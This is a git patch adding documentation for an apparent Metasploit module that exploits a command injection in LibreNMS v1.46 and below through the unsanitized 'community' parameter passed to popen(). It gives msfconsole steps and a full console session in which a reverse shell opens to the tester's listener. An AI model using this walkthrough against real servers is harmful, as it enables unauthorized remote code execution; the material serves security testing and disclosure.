From bd0109b328511ca21ed263fd7ae6d35e2bea4dee Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Wed, 29 May 2019 15:51:53 -0500 Subject: [PATCH] add documentation --- .../linux/http/librenms_cmd_injection.md | 64 +++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/librenms_cmd_injection.md diff --git a/documentation/modules/exploit/linux/http/librenms_cmd_injection.md b/documentation/modules/exploit/linux/http/librenms_cmd_injection.md new file mode 100644 index 0000000000..01ac9be33e --- /dev/null +++ b/documentation/modules/exploit/linux/http/librenms_cmd_injection.md @@ -0,0 +1,64 @@ +## Description + + In LibreNMS `v1.46` and below, there exists a command injection vulnerability in `capture.inc.php`. + The vulnerable functionality is intended to run a command such as `snmpwalk` and save the output as + a file. The `community` parameter is an unsanitized parameter retrieved through a POST request to `addhost`, + and it is used to build the command that is executed in the `capture.inc.php` functionality. The final command + is passed to the `popen()` function, which results in execution of arbitrary code. + + This module has been tested on LibreNMS `v1.46` and `v1.45`. + +## Vulnerable Application + + A vulnerable version of LibreNMS for Ubuntu can be installed using the instructions [here](https://docs.librenms.org/Installation/Installation-Ubuntu-1804-Apache/). + In the command `composer create-project --no-dev --keep-vcs librenms/librenms librenms dev-master`, replace `dev-master` + with a vulnerable version of the software, ex: `1.46`. + +## Verification Steps + + 1. Install the application + 2. Start msfconsole + 3. Do: ```use exploit/linux/http/librenms_cmd_injection``` + 4. Do: ```set RHOSTS ``` + 5. Do: ```set USERNAME ``` + 6. Do: ```set PASSWORD ``` + 7. Do: ```run``` + 8. You should get a shell. + +## Scenarios + +### Tested on LibreNMS 1.46 on Ubuntu 18.04 + + ``` + msf5 > use exploit/linux/http/librenms_cmd_injection + msf5 exploit(linux/http/librenms_cmd_injection) > set rhosts 192.168.37.143 + rhosts => 192.168.37.143 + msf5 exploit(linux/http/librenms_cmd_injection) > set username blah + username => blah + msf5 exploit(linux/http/librenms_cmd_injection) > set password password + password => password + msf5 exploit(linux/http/librenms_cmd_injection) > set lhost 192.168.37.1 + lhost => 192.168.37.1 + msf5 exploit(linux/http/librenms_cmd_injection) > run + + [*] Started reverse TCP double handler on 192.168.37.1:4444 + [*] Successfully logged into LibreNMS + [+] Successfully added device with hostname dFEzcH + [*] Accepted the first client connection... + [*] Accepted the second client connection... + [+] Successfully deleted device with hostname dFEzcH and id #126 + [*] Command: echo 38eJIFZsiRl3Er48; + [*] Writing to socket A + [*] Writing to socket B + [*] Reading from sockets... + [*] Reading from socket A + [*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\n38eJIFZsiRl3Er48\r\n" + [*] Matching... + [*] B is input... + [*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.143:55380) at 2019-05-29 15:26:02 -0500 + + whoami + www-data + uname -a + Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux + ```